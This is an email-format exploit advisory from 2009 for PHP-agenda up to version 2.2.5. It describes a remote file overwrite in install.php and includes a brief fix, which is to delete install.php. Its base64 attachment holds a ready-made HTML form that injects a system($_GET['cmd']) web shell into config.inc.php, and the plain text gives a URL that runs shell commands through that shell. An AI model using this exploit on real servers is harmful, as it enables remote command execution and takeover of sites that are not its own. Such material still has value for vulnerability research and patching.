|
--0016368e2bc90370450467333c5c
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 7bit
******* Salvatore "drosophila" Fresta *******
[+] Application: PHP-agenda
[+] Version: <= 2.2.5
[+] Website: http://php-agenda.sourceforge.net
[+] Bugs: [A] Remote File Overwriting
[+] Exploitation: Remote
[+] Date: 10 Apr 2009
[+] Discovered by: Salvatore "drosophila" Fresta
[+] Author: Salvatore "drosophila" Fresta
[+] Contact: e-mail: drosophilaxxx@gmail.com
*************************************************
[+] Menu
1) Bugs
2) Code
3) Fix
*************************************************
[+] Bugs
- [A] Remote File Overwriting
[-] Risk: hight
[-] File affected: install.php
This bug allows a guest to overwrite config.inc.php
inserting PHP code.
*************************************************
[+] Code
- [A] Remote File Overwriting
PHP-agenda <= 2.2.5 - Remote File Overwriting
To execute commands:
http://www.site.com/path/config.inc.php?cmd=uname -a
*************************************************
[+] Fix
You must delete install.php after installation.
*************************************************
--
Salvatore "drosophila" Fresta
CWNP444351
--0016368e2bc90370450467333c5c
Content-Type: text/plain; charset=US-ASCII;
name="PHP-agenda <= 2.2.5 Remote File Overwriting-10042009.txt"
Content-Disposition: attachment;
filename="PHP-agenda <= 2.2.5 Remote File Overwriting-10042009.txt"
Content-Transfer-Encoding: base64
X-Attachment-Id: f_ftcwngkm0
KioqKioqKiAgIFNhbHZhdG9yZSAiZHJvc29waGlsYSIgRnJlc3RhICAgKioqKioqKgoKWytdIEFw
cGxpY2F0aW9uOiBQSFAtYWdlbmRhClsrXSBWZXJzaW9uOiA8PSAyLjIuNQpbK10gV2Vic2l0ZTog
aHR0cDovL3BocC1hZ2VuZGEuc291cmNlZm9yZ2UubmV0CgpbK10gQnVnczogW0FdIFJlbW90ZSBG
aWxlIE92ZXJ3cml0aW5nCgpbK10gRXhwbG9pdGF0aW9uOiBSZW1vdGUKWytdIERhdGU6IDEwIEFw
ciAyMDA5CgpbK10gRGlzY292ZXJlZCBieTogU2FsdmF0b3JlICJkcm9zb3BoaWxhIiBGcmVzdGEK
WytdIEF1dGhvcjogU2FsdmF0b3JlICJkcm9zb3BoaWxhIiBGcmVzdGEKWytdIENvbnRhY3Q6IGUt
bWFpbDogZHJvc29waGlsYXh4eEBnbWFpbC5jb20KCgoqKioqKioqKioqKioqKioqKioqKioqKioq
KioqKioqKioqKioqKioqKioqKioqKioqCgpbK10gTWVudQoKMSkgQnVncwoyKSBDb2RlCjMpIEZp
eAoKCioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioKClsr
XSBCdWdzCgoKLSBbQV0gUmVtb3RlIEZpbGUgT3ZlcndyaXRpbmcKClstXSBSaXNrOiBoaWdodApb
LV0gRmlsZSBhZmZlY3RlZDogaW5zdGFsbC5waHAKClRoaXMgYnVnIGFsbG93cyBhIGd1ZXN0IHRv
IG92ZXJ3cml0ZSBjb25maWcuaW5jLnBocAppbnNlcnRpbmcgUEhQIGNvZGUuCgoKKioqKioqKioq
KioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKgoKWytdIENvZGUKCgotIFtB
XSBSZW1vdGUgRmlsZSBPdmVyd3JpdGluZwoKPGh0bWw+CiAgPGhlYWQ+UEhQLWFnZW5kYSA8PSAy
LjIuNSAtIFJlbW90ZSBGaWxlIE92ZXJ3cml0aW5nPC9oZWFkPgogIDxib2R5PgogICAgPGZvcm0g
YWN0aW9uPSJodHRwOi8vd3d3LnNpdGUuY29tL3BhdGgvaW5zdGFsbC5waHAiIG1ldGhvZD0icG9z
dCI+CiAgICAgIDxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJkYmhvc3QiIHNpemU9IjMwIiB2YWx1
ZT0iJzsgc3lzdGVtKCRfR0VUWydjbWQnXSk7IGVjaG8gJyI+CiAgICAgIDxpbnB1dCB0eXBlPSJz
dWJtaXQiIHZhbHVlPSJFeHBsb2l0ISIgPgogICAgPC9mb3JtPgogIDwvYm9keT4KPC9oZWFkPgoK
VG8gZXhlY3V0ZSBjb21tYW5kczoKCmh0dHA6Ly93d3cuc2l0ZS5jb20vcGF0aC9jb25maWcuaW5j
LnBocD9jbWQ9dW5hbWUgLWEKCgoqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq
KioqKioqKioqKioqCgpbK10gRml4CgpZb3UgbXVzdCBkZWxldGUgaW5zdGFsbC5waHAgYWZ0ZXIg
aW5zdGFsbGF0aW9uLgoKCioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq
KioqKioqKio--0016368e2bc90370450467333c5c--